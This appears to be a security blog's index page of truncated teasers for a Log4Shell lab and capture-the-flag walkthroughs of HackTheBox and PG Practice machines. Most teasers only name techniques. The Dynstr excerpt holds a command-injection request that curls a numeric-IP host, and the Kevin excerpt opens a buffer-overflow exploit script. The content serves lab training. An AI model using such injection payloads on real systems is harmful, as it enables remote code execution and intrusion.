Lab – Exploiting Log4Shell (CVE-2021-44228)
Background On December 10th, 2021 the Log4Shell vulnerability, a “0-day” exploit in log4j2 appeared on Twitter. In this post, we will explore how to exploit it with LDAP in a lab environment. In o...
Background On December 10th, 2021 the Log4Shell vulnerability, a “0-day” exploit in log4j2 appeared on Twitter. In this post, we will explore how to exploit it with LDAP in a lab environment. In o...
We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes. For root, we will abuse GPO Permissions and explore 2 unintended privilege esc...
We are solving intelligence, a nice Windows machine on HackTheBox, created by Micah. For user, we will enumerate pdfs on a webserver & will use both the content & metadata to find valid cre...
We are solving Hutch from PG-Practice. For user, we will get credentials from LDAP & use them to upload a web shell via Webdav. For root, we will read a LAPS password for the intended way &...
We are solving Pivotapi, a 50-point Windows machine on HackTheBox. This one involves some Reverse Engineering, MSSQL, and Active Directory Attacks like Kerberoasting, ASREPRoasting, and various mis...
We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection. Notes Command Injection GET /nic/update?hostname=$(curl+168431223/x...
We are solving Heist from PG Practice. Heist is a really cool Windows machine that involves stealing a hash, reading a gMSA password & exploiting the SeRestorePrivilege. Links https://gith...
We are solving Kevin, an easy-rated Windows machine on PG Practice that involves a SEH Based Buffer Overflow. Notes Starting PoC #!/usr/bin/python from pwn import * from urllib import parse fr...
We are solving Sink, a 50-point Linux machine on HackTheBox that involves HTTP Request Smuggling & retrieving secrets from Localstack. Notes Reads https://nathandavison.com/blog/ha...
On a recent video someone asked a good question in the comments about why we can shutdown a box when our user has SeShutdownPrivilege listed as disabled: whoami /all ... Privilege Name ...